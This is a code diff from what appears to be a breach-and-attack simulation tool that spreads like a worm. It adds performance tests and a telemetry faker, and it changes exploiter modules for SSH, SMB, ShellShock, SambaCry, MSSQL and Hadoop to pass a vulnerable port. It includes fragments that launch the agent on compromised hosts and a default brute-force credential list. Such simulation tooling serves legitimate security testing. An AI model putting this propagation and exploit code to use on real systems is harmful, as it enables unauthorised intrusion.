from datetime import timedelta
from envs.monkey_zoo.blackbox.tests.exploitation import ExploitationTest
from envs.monkey_zoo.blackbox.tests.performance.performance_test import PerformanceTest
from envs.monkey_zoo.blackbox.tests.performance.performance_test_config import PerformanceTestConfig
from envs.monkey_zoo.blackbox.tests.performance.performance_test_workflow import PerformanceTestWorkflow
MAX_ALLOWED_SINGLE_PAGE_TIME = timedelta(seconds=2)
MAX_ALLOWED_TOTAL_TIME = timedelta(seconds=5)
MAP_RESOURCES = [
"api/netmap",
]
class MapGenerationTest(PerformanceTest):
TEST_NAME = "Map generation performance test"
def __init__(self, island_client, config_parser, analyzers,
timeout, log_handler, break_on_timeout):
self.island_client = island_client
self.config_parser = config_parser
exploitation_test = ExploitationTest(MapGenerationTest.TEST_NAME, island_client,
config_parser, analyzers, timeout, log_handler)
performance_config = PerformanceTestConfig(max_allowed_single_page_time=MAX_ALLOWED_SINGLE_PAGE_TIME,
max_allowed_total_time=MAX_ALLOWED_TOTAL_TIME,
endpoints_to_test=MAP_RESOURCES,
break_on_timeout=break_on_timeout)
self.performance_test_workflow = PerformanceTestWorkflow(MapGenerationTest.TEST_NAME,
exploitation_test,
performance_config)
def run(self):
self.performance_test_workflow.run()

View File

@ -0,0 +1,32 @@
from datetime import timedelta
from envs.monkey_zoo.blackbox.tests.performance.performance_test import PerformanceTest
from envs.monkey_zoo.blackbox.tests.performance.performance_test_config import PerformanceTestConfig
from envs.monkey_zoo.blackbox.tests.performance.telemetry_performance_test_workflow import \
TelemetryPerformanceTestWorkflow
MAX_ALLOWED_SINGLE_PAGE_TIME = timedelta(seconds=2)
MAX_ALLOWED_TOTAL_TIME = timedelta(seconds=5)
MAP_RESOURCES = [
"api/netmap",
]
class MapGenerationFromTelemetryTest(PerformanceTest):
TEST_NAME = "Map generation from fake telemetries test"
def __init__(self, island_client, quick_performance_test: bool, break_on_timeout=False):
self.island_client = island_client
performance_config = PerformanceTestConfig(max_allowed_single_page_time=MAX_ALLOWED_SINGLE_PAGE_TIME,
max_allowed_total_time=MAX_ALLOWED_TOTAL_TIME,
endpoints_to_test=MAP_RESOURCES,
break_on_timeout=break_on_timeout)
self.performance_test_workflow = TelemetryPerformanceTestWorkflow(MapGenerationFromTelemetryTest.TEST_NAME,
self.island_client,
performance_config,
quick_performance_test)
def run(self):
self.performance_test_workflow.run()

View File

@ -0,0 +1,16 @@
from abc import ABCMeta, abstractmethod
from envs.monkey_zoo.blackbox.tests.basic_test import BasicTest
class PerformanceTest(BasicTest, metaclass=ABCMeta):
@abstractmethod
def __init__(self, island_client, config_parser, analyzers,
timeout, log_handler, break_on_timeout):
pass
@property
@abstractmethod
def TEST_NAME(self):
pass

View File

@ -0,0 +1,12 @@
from datetime import timedelta
from typing import List
class PerformanceTestConfig:
def __init__(self, max_allowed_single_page_time: timedelta, max_allowed_total_time: timedelta,
endpoints_to_test: List[str] = None, break_on_timeout=False):
self.max_allowed_single_page_time = max_allowed_single_page_time
self.max_allowed_total_time = max_allowed_total_time
self.endpoints_to_test = endpoints_to_test
self.break_on_timeout = break_on_timeout

View File

@ -0,0 +1,35 @@
from envs.monkey_zoo.blackbox.tests.basic_test import BasicTest
from envs.monkey_zoo.blackbox.tests.exploitation import ExploitationTest
from envs.monkey_zoo.blackbox.tests.performance.endpoint_performance_test import EndpointPerformanceTest
from envs.monkey_zoo.blackbox.tests.performance.performance_test_config import PerformanceTestConfig
class PerformanceTestWorkflow(BasicTest):
def __init__(self, name, exploitation_test: ExploitationTest, performance_config: PerformanceTestConfig):
self.name = name
self.exploitation_test = exploitation_test
self.island_client = exploitation_test.island_client
self.config_parser = exploitation_test.config_parser
self.performance_config = performance_config
def run(self):
self.island_client.import_config(self.config_parser.config_raw)
self.exploitation_test.print_test_starting_info()
try:
self.island_client.run_monkey_local()
self.exploitation_test.test_until_timeout()
finally:
self.island_client.kill_all_monkeys()
self.exploitation_test.wait_until_monkeys_die()
self.exploitation_test.wait_for_monkey_process_to_finish()
if not self.island_client.is_all_monkeys_dead():
raise RuntimeError("Can't test report times since not all Monkeys have died.")
performance_test = EndpointPerformanceTest(self.name, self.performance_config, self.island_client)
try:
if not self.island_client.is_all_monkeys_dead():
raise RuntimeError("Can't test report times since not all Monkeys have died.")
assert performance_test.run()
finally:
self.exploitation_test.parse_logs()
self.island_client.reset_env()

View File

@ -0,0 +1,38 @@
from datetime import timedelta
from envs.monkey_zoo.blackbox.tests.exploitation import ExploitationTest
from envs.monkey_zoo.blackbox.tests.performance.performance_test import PerformanceTest
from envs.monkey_zoo.blackbox.tests.performance.performance_test_config import PerformanceTestConfig
from envs.monkey_zoo.blackbox.tests.performance.performance_test_workflow import PerformanceTestWorkflow
MAX_ALLOWED_SINGLE_PAGE_TIME = timedelta(seconds=2)
MAX_ALLOWED_TOTAL_TIME = timedelta(seconds=5)
REPORT_RESOURCES = [
"api/report/security",
"api/attack/report",
"api/report/zero_trust/findings",
"api/report/zero_trust/principles",
"api/report/zero_trust/pillars"
]
class ReportGenerationTest(PerformanceTest):
TEST_NAME = "Report generation performance test"
def __init__(self, island_client, config_parser, analyzers,
timeout, log_handler, break_on_timeout):
self.island_client = island_client
self.config_parser = config_parser
exploitation_test = ExploitationTest(ReportGenerationTest.TEST_NAME, island_client,
config_parser, analyzers, timeout, log_handler)
performance_config = PerformanceTestConfig(max_allowed_single_page_time=MAX_ALLOWED_SINGLE_PAGE_TIME,
max_allowed_total_time=MAX_ALLOWED_TOTAL_TIME,
endpoints_to_test=REPORT_RESOURCES,
break_on_timeout=break_on_timeout)
self.performance_test_workflow = PerformanceTestWorkflow(ReportGenerationTest.TEST_NAME,
exploitation_test,
performance_config)
def run(self):
self.performance_test_workflow.run()

View File

@ -0,0 +1,36 @@
from datetime import timedelta
from envs.monkey_zoo.blackbox.tests.performance.performance_test import PerformanceTest
from envs.monkey_zoo.blackbox.tests.performance.performance_test_config import PerformanceTestConfig
from envs.monkey_zoo.blackbox.tests.performance.telemetry_performance_test_workflow import \
TelemetryPerformanceTestWorkflow
MAX_ALLOWED_SINGLE_PAGE_TIME = timedelta(seconds=2)
MAX_ALLOWED_TOTAL_TIME = timedelta(seconds=5)
REPORT_RESOURCES = [
"api/report/security",
"api/attack/report",
"api/report/zero_trust/findings",
"api/report/zero_trust/principles",
"api/report/zero_trust/pillars"
]
class ReportGenerationFromTelemetryTest(PerformanceTest):
TEST_NAME = "Map generation from fake telemetries test"
def __init__(self, island_client, quick_performance_test, break_on_timeout=False):
self.island_client = island_client
performance_config = PerformanceTestConfig(max_allowed_single_page_time=MAX_ALLOWED_SINGLE_PAGE_TIME,
max_allowed_total_time=MAX_ALLOWED_TOTAL_TIME,
endpoints_to_test=REPORT_RESOURCES,
break_on_timeout=break_on_timeout)
self.performance_test_workflow = TelemetryPerformanceTestWorkflow(ReportGenerationFromTelemetryTest.TEST_NAME,
self.island_client,
performance_config,
quick_performance_test)
def run(self):
self.performance_test_workflow.run()

View File

@ -0,0 +1,47 @@
import json
import logging
from os import listdir, path
from typing import List, Dict
from tqdm import tqdm
TELEM_DIR_PATH = './tests/performance/telem_sample'
MAX_SAME_TYPE_TELEM_FILES = 10000
LOGGER = logging.getLogger(__name__)
class SampleFileParser:
@staticmethod
def save_teletries_to_files(telems: List[Dict]):
for telem in (tqdm(telems, desc="Telemetries saved to files", position=3)):
SampleFileParser.save_telemetry_to_file(telem)
@staticmethod
def save_telemetry_to_file(telem: Dict):
telem_filename = telem['name'] + telem['method']
for i in range(MAX_SAME_TYPE_TELEM_FILES):
if not path.exists(path.join(TELEM_DIR_PATH, (str(i) + telem_filename))):
telem_filename = str(i) + telem_filename
break
with open(path.join(TELEM_DIR_PATH, telem_filename), 'w') as file:
file.write(json.dumps(telem))
@staticmethod
def read_telem_files() -> List[str]:
telems = []
try:
file_paths = [path.join(TELEM_DIR_PATH, f) for f in listdir(TELEM_DIR_PATH)
if path.isfile(path.join(TELEM_DIR_PATH, f))]
except FileNotFoundError:
raise FileNotFoundError("Telemetries to send not found. "
"Refer to readme to figure out how to generate telemetries and where to put them.")
for file_path in file_paths:
with open(file_path, 'r') as telem_file:
telem_string = "".join(telem_file.readlines()).replace("\n", "")
telems.append(telem_string)
return telems
@staticmethod
def get_all_telemetries() -> List[Dict]:
return [json.loads(t) for t in SampleFileParser.read_telem_files()]

View File

@ -0,0 +1,25 @@
from typing import List
class FakeIpGenerator:
def __init__(self):
self.fake_ip_parts = [1, 1, 1, 1]
def generate_fake_ips_for_real_ips(self, real_ips: List[str]) -> List[str]:
fake_ips = []
for i in range(len(real_ips)):
fake_ips.append('.'.join(str(part) for part in self.fake_ip_parts))
self.increment_ip()
return fake_ips
def increment_ip(self):
self.fake_ip_parts[3] += 1
self.try_fix_ip_range()
def try_fix_ip_range(self):
for i in range(len(self.fake_ip_parts)):
if self.fake_ip_parts[i] > 256:
if i-1 < 0:
raise Exception("Fake IP's out of range.")
self.fake_ip_parts[i-1] += 1
self.fake_ip_parts[i] = 1

View File

@ -0,0 +1,18 @@
import random
from envs.monkey_zoo.blackbox.tests.performance.\
telem_sample_parsing.sample_multiplier.fake_ip_generator import FakeIpGenerator
class FakeMonkey:
def __init__(self, ips, guid, fake_ip_generator: FakeIpGenerator, on_island=False):
self.original_ips = ips
self.original_guid = guid
self.fake_ip_generator = fake_ip_generator
self.on_island = on_island
self.fake_guid = str(random.randint(1000000000000, 9999999999999)) # noqa: DUO102
self.fake_ips = fake_ip_generator.generate_fake_ips_for_real_ips(ips)
def change_fake_data(self):
self.fake_ips = self.fake_ip_generator.generate_fake_ips_for_real_ips(self.original_ips)
self.fake_guid = str(random.randint(1000000000000, 9999999999999)) # noqa: DUO102

View File

@ -0,0 +1,89 @@
import copy
import json
import logging
import sys
from typing import List, Dict
from tqdm import tqdm
from envs.monkey_zoo.blackbox.tests.performance.telem_sample_parsing.sample_file_parser import SampleFileParser
from envs.monkey_zoo.blackbox.tests.performance.\
telem_sample_parsing.sample_multiplier.fake_ip_generator import FakeIpGenerator
from envs.monkey_zoo.blackbox.tests.performance.telem_sample_parsing.sample_multiplier.fake_monkey import FakeMonkey
TELEM_DIR_PATH = './tests/performance/telemetry_sample'
LOGGER = logging.getLogger(__name__)
class SampleMultiplier:
def __init__(self, multiplier: int):
self.multiplier = multiplier
self.fake_ip_generator = FakeIpGenerator()
def multiply_telems(self):
telems = SampleFileParser.get_all_telemetries()
telem_contents = [json.loads(telem['content']) for telem in telems]
monkeys = self.get_monkeys_from_telems(telem_contents)
for i in tqdm(range(self.multiplier), desc="Batch of fabricated telemetries", position=1):
for monkey in monkeys:
monkey.change_fake_data()
fake_telem_batch = copy.deepcopy(telems)
SampleMultiplier.fabricate_monkeys_in_telems(fake_telem_batch, monkeys)
SampleMultiplier.offset_telem_times(iteration=i, telems=fake_telem_batch)
SampleFileParser.save_teletries_to_files(fake_telem_batch)
LOGGER.info("")
@staticmethod
def fabricate_monkeys_in_telems(telems: List[Dict], monkeys: List[FakeMonkey]):
for telem in tqdm(telems, desc="Telemetries fabricated", position=2):
for monkey in monkeys:
if monkey.on_island:
continue
if (monkey.original_guid in telem['content'] or monkey.original_guid in telem['endpoint']) \
and not monkey.on_island:
telem['content'] = telem['content'].replace(monkey.original_guid, monkey.fake_guid)
telem['endpoint'] = telem['endpoint'].replace(monkey.original_guid, monkey.fake_guid)
for i in range(len(monkey.original_ips)):
telem['content'] = telem['content'].replace(monkey.original_ips[i], monkey.fake_ips[i])
@staticmethod
def offset_telem_times(iteration: int, telems: List[Dict]):
for telem in telems:
telem['time']['$date'] += iteration * 1000
def get_monkeys_from_telems(self, telems: List[Dict]):
island_ips = SampleMultiplier.get_island_ips_from_telems(telems)
monkeys = []
for telem in [telem for telem in telems
if 'telem_category' in telem and telem['telem_category'] == 'system_info']:
if 'network_info' not in telem['data']:
continue
guid = telem['monkey_guid']
monkey_present = [monkey for monkey in monkeys if monkey.original_guid == guid]
if not monkey_present:
ips = [net_info['addr'] for net_info in telem['data']['network_info']['networks']]
if set(island_ips).intersection(ips):
on_island = True
else:
on_island = False
monkeys.append(FakeMonkey(ips=ips,
guid=guid,
fake_ip_generator=self.fake_ip_generator,
on_island=on_island))
return monkeys
@staticmethod
def get_island_ips_from_telems(telems: List[Dict]) -> List[str]:
island_ips = []
for telem in telems:
if 'config' in telem:
island_ips = telem['config']['command_servers']
for i in range(len(island_ips)):
island_ips[i] = island_ips[i].replace(":5000", "")
return island_ips
if __name__ == "__main__":
SampleMultiplier(multiplier=int(sys.argv[1])).multiply_telems()

View File

@ -0,0 +1,19 @@
from unittest import TestCase
from envs.monkey_zoo.blackbox.tests.performance.\
telem_sample_parsing.sample_multiplier.fake_ip_generator import FakeIpGenerator
class TestFakeIpGenerator(TestCase):
def test_fake_ip_generation(self):
fake_ip_gen = FakeIpGenerator()
self.assertListEqual([1, 1, 1, 1], fake_ip_gen.fake_ip_parts)
for i in range(256):
fake_ip_gen.generate_fake_ips_for_real_ips(['1.1.1.1'])
self.assertListEqual(['1.1.2.1'], fake_ip_gen.generate_fake_ips_for_real_ips(['1.1.1.1']))
fake_ip_gen.fake_ip_parts = [256, 256, 255, 256]
self.assertListEqual(['256.256.255.256', '256.256.256.1'],
fake_ip_gen.generate_fake_ips_for_real_ips(['1.1.1.1', '1.1.1.2']))
fake_ip_gen.fake_ip_parts = [256, 256, 256, 256]
self.assertRaises(Exception, fake_ip_gen.generate_fake_ips_for_real_ips(['1.1.1.1']))

View File

@ -0,0 +1,55 @@
import json
import logging
from datetime import timedelta
from tqdm import tqdm
from envs.monkey_zoo.blackbox.analyzers.performance_analyzer import PerformanceAnalyzer
from envs.monkey_zoo.blackbox.island_client.monkey_island_client import MonkeyIslandClient
from envs.monkey_zoo.blackbox.island_client.supported_request_method import SupportedRequestMethod
from envs.monkey_zoo.blackbox.tests.performance.performance_test_config import PerformanceTestConfig
from envs.monkey_zoo.blackbox.tests.performance.telem_sample_parsing.sample_file_parser import SampleFileParser
LOGGER = logging.getLogger(__name__)
MAX_ALLOWED_SINGLE_TELEM_PARSE_TIME = timedelta(seconds=2)
MAX_ALLOWED_TOTAL_TIME = timedelta(seconds=60)
class TelemetryPerformanceTest:
def __init__(self, island_client: MonkeyIslandClient, quick_performance_test: bool):
self.island_client = island_client
self.quick_performance_test = quick_performance_test
def test_telemetry_performance(self):
LOGGER.info("Starting telemetry performance test.")
try:
all_telemetries = SampleFileParser.get_all_telemetries()
except FileNotFoundError:
raise FileNotFoundError("Telemetries to send not found. "
"Refer to readme to figure out how to generate telemetries and where to put them.")
LOGGER.info("Telemetries imported successfully.")
all_telemetries.sort(key=lambda telem: telem['time']['$date'])
telemetry_parse_times = {}
for telemetry in tqdm(all_telemetries, total=len(all_telemetries), ascii=True, desc="Telemetries sent"):
telemetry_endpoint = TelemetryPerformanceTest.get_verbose_telemetry_endpoint(telemetry)
telemetry_parse_times[telemetry_endpoint] = self.get_telemetry_time(telemetry)
test_config = PerformanceTestConfig(MAX_ALLOWED_SINGLE_TELEM_PARSE_TIME, MAX_ALLOWED_TOTAL_TIME)
PerformanceAnalyzer(test_config, telemetry_parse_times).analyze_test_results()
if not self.quick_performance_test:
self.island_client.reset_env()
def get_telemetry_time(self, telemetry):
content = telemetry['content']
url = telemetry['endpoint']
method = SupportedRequestMethod.__getattr__(telemetry['method'])
return self.island_client.requests.get_request_time(url=url, method=method, data=content)
@staticmethod
def get_verbose_telemetry_endpoint(telemetry):
telem_category = ""
if "telem_category" in telemetry['content']:
telem_category = "_" + json.loads(telemetry['content'])['telem_category'] + "_" + telemetry['_id']['$oid']
return telemetry['endpoint'] + telem_category

View File

@ -0,0 +1,25 @@
from envs.monkey_zoo.blackbox.tests.basic_test import BasicTest
from envs.monkey_zoo.blackbox.tests.performance.endpoint_performance_test import EndpointPerformanceTest
from envs.monkey_zoo.blackbox.tests.performance.performance_test_config import PerformanceTestConfig
from envs.monkey_zoo.blackbox.tests.performance.telemetry_performance_test import TelemetryPerformanceTest
class TelemetryPerformanceTestWorkflow(BasicTest):
def __init__(self, name, island_client, performance_config: PerformanceTestConfig, quick_performance_test):
self.name = name
self.island_client = island_client
self.performance_config = performance_config
self.quick_performance_test = quick_performance_test
def run(self):
try:
if not self.quick_performance_test:
telem_sending_test = TelemetryPerformanceTest(island_client=self.island_client,
quick_performance_test=self.quick_performance_test)
telem_sending_test.test_telemetry_performance()
performance_test = EndpointPerformanceTest(self.name, self.performance_config, self.island_client)
assert performance_test.run()
finally:
if not self.quick_performance_test:
self.island_client.reset_env()

View File

@ -1,6 +1,5 @@
import subprocess
import logging
import subprocess
LOGGER = logging.getLogger(__name__)
@ -16,10 +15,10 @@ class GCPHandler(object):
self.zone = zone
try:
# pass the key file to gcp
subprocess.call(GCPHandler.get_auth_command(key_path), shell=True)
subprocess.call(GCPHandler.get_auth_command(key_path), shell=True) # noqa: DUO116
LOGGER.info("GCP Handler passed key")
# set project
subprocess.call(GCPHandler.get_set_project_command(project_id), shell=True)
subprocess.call(GCPHandler.get_set_project_command(project_id), shell=True) # noqa: DUO116
LOGGER.info("GCP Handler set project")
LOGGER.info("GCP Handler initialized successfully")
except Exception as e:
@ -33,14 +32,14 @@ class GCPHandler(object):
"""
LOGGER.info("Setting up all GCP machines...")
try:
subprocess.call((GCPHandler.MACHINE_STARTING_COMMAND % (machine_list, self.zone)), shell=True)
subprocess.call((GCPHandler.MACHINE_STARTING_COMMAND % (machine_list, self.zone)), shell=True) # noqa: DUO116
LOGGER.info("GCP machines successfully started.")
except Exception as e:
LOGGER.error("GCP Handler failed to start GCP machines: %s" % e)
def stop_machines(self, machine_list):
try:
subprocess.call((GCPHandler.MACHINE_STOPPING_COMMAND % (machine_list, self.zone)), shell=True)
subprocess.call((GCPHandler.MACHINE_STOPPING_COMMAND % (machine_list, self.zone)), shell=True) # noqa: DUO116
LOGGER.info("GCP machines stopped successfully.")
except Exception as e:
LOGGER.error("GCP Handler failed to stop network machines: %s" % e)

View File

@ -1,4 +1,5 @@
import json
from bson import ObjectId

View File

@ -57,6 +57,3 @@ class TestOSCompatibility(object):
if len(ips_that_communicated) < len(machine_list):
assert False

View File

@ -0,0 +1,12 @@
from urllib.parse import urlparse
def get_host_from_network_location(network_location: str) -> str:
"""
URL structure is "<scheme>://<net_loc>/<path>;<params>?<query>#<fragment>" (https://tools.ietf.org/html/rfc1808.html)
And the net_loc is "<user>:<password>@<host>:<port>" (https://tools.ietf.org/html/rfc1738#section-3.1)
:param network_location: server network location
:return: host part of the network location
"""
url = urlparse("http://" + network_location)
return str(url.hostname)

View File

@ -0,0 +1,12 @@
from unittest import TestCase
from common.network.network_utils import get_host_from_network_location
class TestNetworkUtils(TestCase):
def test_remove_port_from_ip_string(self):
assert get_host_from_network_location("127.0.0.1:12345") == "127.0.0.1"
assert get_host_from_network_location("127.0.0.1:12345") == "127.0.0.1"
assert get_host_from_network_location("127.0.0.1") == "127.0.0.1"
assert get_host_from_network_location("www.google.com:8080") == "www.google.com"
assert get_host_from_network_location("user:password@host:8080") == "host"

View File

@ -1,5 +1,7 @@
import wmi
import win32com
import sys
if sys.platform == 'win32':
import win32com
import wmi
__author__ = 'maor.rayzin'

View File

@ -1,25 +0,0 @@
import winreg
from common.utils.mongo_utils import MongoUtils
__author__ = 'maor.rayzin'
class RegUtils:
def __init__(self):
# Static class
pass
@staticmethod
def get_reg_key(subkey_path, store=winreg.HKEY_LOCAL_MACHINE):
key = winreg.ConnectRegistry(None, store)
subkey = winreg.OpenKey(key, subkey_path)
d = dict([winreg.EnumValue(subkey, i)[:2] for i in range(winreg.QueryInfoKey(subkey)[0])])
d = MongoUtils.fix_obj_for_mongo(d)
subkey.Close()
key.Close()
return d

View File

@ -4,7 +4,7 @@ from pathlib import Path
MAJOR = "1"
MINOR = "8"
PATCH = "1"
PATCH = "2"
build_file_path = Path(__file__).parent.joinpath("BUILD")
with open(build_file_path, "r") as build_file:
BUILD = build_file.read()

View File

@ -13,6 +13,7 @@ GUID = str(uuid.getnode())
EXTERNAL_CONFIG_FILE = os.path.join(os.path.abspath(os.path.dirname(sys.argv[0])), 'monkey.bin')
SENSITIVE_FIELDS = ["exploit_password_list", "exploit_user_list", "exploit_ssh_keys"]
LOCAL_CONFIG_VARS = ["name", "id", "current_server", "max_depth"]
HIDDEN_FIELD_REPLACEMENT_CONTENT = "hidden"
@ -22,14 +23,17 @@ class Configuration(object):
for key, value in list(formatted_data.items()):
if key.startswith('_'):
continue
if key in ["name", "id", "current_server"]:
if key in LOCAL_CONFIG_VARS:
continue
if self._depth_from_commandline and key == "depth":
self.max_depth = value
continue
if hasattr(self, key):
setattr(self, key, value)
else:
unknown_items.append(key)
if not self.max_depth:
self.max_depth = self.depth
return unknown_items
def from_json(self, json_data):
@ -135,6 +139,8 @@ class Configuration(object):
# depth of propagation
depth = 2
max_depth = None
started_on_island = False
current_server = ""
# Configuration servers to try to connect to, in this order.
@ -232,6 +238,18 @@ class Configuration(object):
cred_list.append(cred)
return cred_list
@staticmethod
def hash_sensitive_data(sensitive_data):
"""
Hash sensitive data (e.g. passwords). Used so the log won't contain sensitive data plain-text, as the log is
saved on client machines plain-text.
:param sensitive_data: the data to hash.
:return: the hashed data.
"""
password_hashed = hashlib.sha512(sensitive_data.encode()).hexdigest()
return password_hashed
exploit_user_list = ['Administrator', 'root', 'user']
exploit_password_list = ["Password1!", "1234", "password", "12345678"]
exploit_lm_hash_list = []
@ -259,23 +277,22 @@ class Configuration(object):
extract_azure_creds = True
###########################
# post breach actions
###########################
post_breach_actions = []
custom_PBA_linux_cmd = ""
custom_PBA_windows_cmd = ""
PBA_linux_filename = None
PBA_windows_filename = None
@staticmethod
def hash_sensitive_data(sensitive_data):
"""
Hash sensitive data (e.g. passwords). Used so the log won't contain sensitive data plain-text, as the log is
saved on client machines plain-text.
###########################
# testing configuration
###########################
export_monkey_telems = False
:param sensitive_data: the data to hash.
:return: the hashed data.
"""
password_hashed = hashlib.sha512(sensitive_data.encode()).hexdigest()
return password_hashed
def get_hop_distance_to_island(self):
return self.max_depth - self.depth
WormConfiguration = Configuration()

View File

@ -15,6 +15,8 @@ from infection_monkey.transport.tcp import TcpProxy
__author__ = 'hoffer'
from infection_monkey.utils.exceptions.planned_shutdown_exception import PlannedShutdownException
requests.packages.urllib3.disable_warnings()
LOG = logging.getLogger(__name__)
@ -321,3 +323,29 @@ class ControlClient(object):
proxies=ControlClient.proxies)
except requests.exceptions.RequestException:
return False
@staticmethod
def should_monkey_run(vulnerable_port: str) -> bool:
if vulnerable_port and \
WormConfiguration.get_hop_distance_to_island() > 1 and \
ControlClient.can_island_see_port(vulnerable_port) and \
WormConfiguration.started_on_island:
raise PlannedShutdownException("Monkey shouldn't run on current machine "
"(it will be exploited later with more depth).")
return True
@staticmethod
def can_island_see_port(port):
try:
url = f"https://{WormConfiguration.current_server}/api/monkey_control/check_remote_port/{port}"
response = requests.get(url, verify=False)
response = json.loads(response.content.decode())
return response['status'] == "port_visible"
except requests.exceptions.RequestException:
return False
@staticmethod
def report_start_on_island():
requests.post(f"https://{WormConfiguration.current_server}/api/monkey_control/started_on_island",
data=json.dumps({'started_on_island': True}),
verify=False)

View File

@ -44,6 +44,7 @@ class MonkeyDrops(object):
arg_parser.add_argument('-s', '--server')
arg_parser.add_argument('-d', '--depth', type=int)
arg_parser.add_argument('-l', '--location')
arg_parser.add_argument('-vp', '--vulnerable-port')
self.monkey_args = args[1:]
self.opts, _ = arg_parser.parse_known_args(args)
@ -115,7 +116,12 @@ class MonkeyDrops(object):
LOG.warning("Cannot set reference date to destination file")
monkey_options = \
build_monkey_commandline_explicitly(self.opts.parent, self.opts.tunnel, self.opts.server, self.opts.depth)
build_monkey_commandline_explicitly(parent=self.opts.parent,
tunnel=self.opts.tunnel,
server=self.opts.server,
depth=self.opts.depth,
location=None,
vulnerable_port=self.opts.vulnerable_port)
if OperatingSystem.Windows == SystemInfoCollector.get_os():
monkey_cmdline = MONKEY_CMDLINE_WINDOWS % {'monkey_path': self._config['destination_path']} + monkey_options

View File

@ -73,7 +73,8 @@ class HadoopExploiter(WebRCE):
def build_command(self, path, http_path):
# Build command to execute
monkey_cmd = build_monkey_commandline(self.host, get_monkey_depth() - 1)
monkey_cmd = build_monkey_commandline(self.host, get_monkey_depth() - 1,
vulnerable_port=HadoopExploiter.HADOOP_PORTS[0][0])
if 'linux' in self.host.os['type']:
base_command = HADOOP_LINUX_COMMAND
else:

View File

@ -133,6 +133,7 @@ class MSSQLExploiter(HostExploiter):
# Form monkey's launch command
monkey_args = build_monkey_commandline(self.host,
get_monkey_depth() - 1,
MSSQLExploiter.SQL_DEFAULT_TCP_PORT,
dst_path)
suffix = ">>{}".format(self.payload_file_path)
prefix = MSSQLExploiter.EXPLOIT_COMMAND_PREFIX

View File

@ -329,7 +329,10 @@ class SambaCryExploiter(HostExploiter):
return open(get_binary_file_path(self.SAMBACRY_RUNNER_FILENAME_64), "rb")
def get_monkey_commandline_file(self, location):
return BytesIO(DROPPER_ARG + build_monkey_commandline(self.host, get_monkey_depth() - 1, str(location)))
return BytesIO(DROPPER_ARG + build_monkey_commandline(self.host,
get_monkey_depth() - 1,
SambaCryExploiter.SAMBA_PORT,
str(location)))
@staticmethod
def is_share_writable(smb_client, share):

View File

@ -144,7 +144,11 @@ class ShellShockExploiter(HostExploiter):
# run the monkey
cmdline = "%s %s" % (dropper_target_path_linux, DROPPER_ARG)
cmdline += build_monkey_commandline(self.host, get_monkey_depth() - 1, dropper_target_path_linux) + ' & '
cmdline += build_monkey_commandline(self.host,
get_monkey_depth() - 1,
HTTPTools.get_port_from_url(url),
dropper_target_path_linux)
cmdline += ' & '
run_path = exploit + cmdline
self.attack_page(url, header, run_path)

View File

@ -6,7 +6,7 @@ from impacket.smbconnection import SMB_DIALECT
from infection_monkey.exploit.HostExploiter import HostExploiter
from infection_monkey.exploit.tools.helpers import get_target_monkey, get_monkey_depth, build_monkey_commandline
from infection_monkey.exploit.tools.smb_tools import SmbTools
from infection_monkey.model import MONKEY_CMDLINE_DETACHED_WINDOWS, DROPPER_CMDLINE_DETACHED_WINDOWS
from infection_monkey.model import MONKEY_CMDLINE_DETACHED_WINDOWS, DROPPER_CMDLINE_DETACHED_WINDOWS, VictimHost
from infection_monkey.network.smbfinger import SMBFinger
from infection_monkey.network.tools import check_tcp_port
from common.utils.exploit_enum import ExploitType
@ -28,6 +28,7 @@ class SmbExploiter(HostExploiter):
def __init__(self, host):
super(SmbExploiter, self).__init__(host)
self.vulnerable_port = None
def is_os_supported(self):
if super(SmbExploiter, self).is_os_supported():
@ -99,14 +100,18 @@ class SmbExploiter(HostExploiter):
LOG.debug("Exploiter SmbExec is giving up...")
return False
self.set_vulnerable_port(self.host)
# execute the remote dropper in case the path isn't final
if remote_full_path.lower() != self._config.dropper_target_path_win_32.lower():
cmdline = DROPPER_CMDLINE_DETACHED_WINDOWS % {'dropper_path': remote_full_path} + \
build_monkey_commandline(self.host, get_monkey_depth() - 1,
self.vulnerable_port,
self._config.dropper_target_path_win_32)
else:
cmdline = MONKEY_CMDLINE_DETACHED_WINDOWS % {'monkey_path': remote_full_path} + \
build_monkey_commandline(self.host, get_monkey_depth() - 1)
build_monkey_commandline(self.host,
get_monkey_depth() - 1,
vulnerable_port=self.vulnerable_port)
smb_conn = False
for str_bind_format, port in SmbExploiter.KNOWN_PROTOCOLS.values():
@ -158,3 +163,11 @@ class SmbExploiter(HostExploiter):
self.add_vuln_port("%s or %s" % (SmbExploiter.KNOWN_PROTOCOLS['139/SMB'][1],
SmbExploiter.KNOWN_PROTOCOLS['445/SMB'][1]))
return True
def set_vulnerable_port(self, host: VictimHost):
if 'tcp-445' in self.host.services:
self.vulnerable_port = "445"
elif 'tcp-139' in self.host.services:
self.vulnerable_port = "139"
else:
self.vulnerable_port = None

View File

@ -179,7 +179,9 @@ class SSHExploiter(HostExploiter):
try:
cmdline = "%s %s" % (self._config.dropper_target_path_linux, MONKEY_ARG)
cmdline += build_monkey_commandline(self.host, get_monkey_depth() - 1)
cmdline += build_monkey_commandline(self.host,
get_monkey_depth() - 1,
vulnerable_port=SSH_PORT)
cmdline += " > /dev/null 2>&1 &"
ssh.exec_command(cmdline)

View File

@ -41,29 +41,32 @@ def get_target_monkey_by_os(is_windows, is_32bit):
return ControlClient.download_monkey_exe_by_os(is_windows, is_32bit)
def build_monkey_commandline_explicitly(parent=None, tunnel=None, server=None, depth=None, location=None):
def build_monkey_commandline_explicitly(parent=None, tunnel=None, server=None, depth=None, location=None,
vulnerable_port=None):
cmdline = ""
if parent is not None:
cmdline += " -p " + parent
cmdline += f" -p {parent}"
if tunnel is not None:
cmdline += " -t " + tunnel
cmdline += f" -t {tunnel}"
if server is not None:
cmdline += " -s " + server
cmdline += f" -s {server}"
if depth is not None:
if depth < 0:
if int(depth) < 0:
depth = 0
cmdline += " -d %d" % depth
cmdline += f" -d {depth}"
if location is not None:
cmdline += " -l %s" % location
cmdline += f" -l {location}"
if vulnerable_port is not None:
cmdline += f" -vp {vulnerable_port}"
return cmdline
def build_monkey_commandline(target_host, depth, location=None):
def build_monkey_commandline(target_host, depth, vulnerable_port, location=None):
from infection_monkey.config import GUID
return build_monkey_commandline_explicitly(
GUID, target_host.default_tunnel, target_host.default_server, depth, location)
GUID, target_host.default_tunnel, target_host.default_server, depth, location, vulnerable_port)
def get_monkey_depth():

View File

@ -73,6 +73,10 @@ class HTTPTools(object):
lock.acquire()
return "http://%s:%s/%s" % (local_ip, local_port, urllib.parse.quote(os.path.basename(src_path))), httpd
@staticmethod
def get_port_from_url(url: str) -> int:
return urllib.parse.urlparse(url).port
class MonkeyHTTPServer(HTTPTools):
def __init__(self, host):

View File

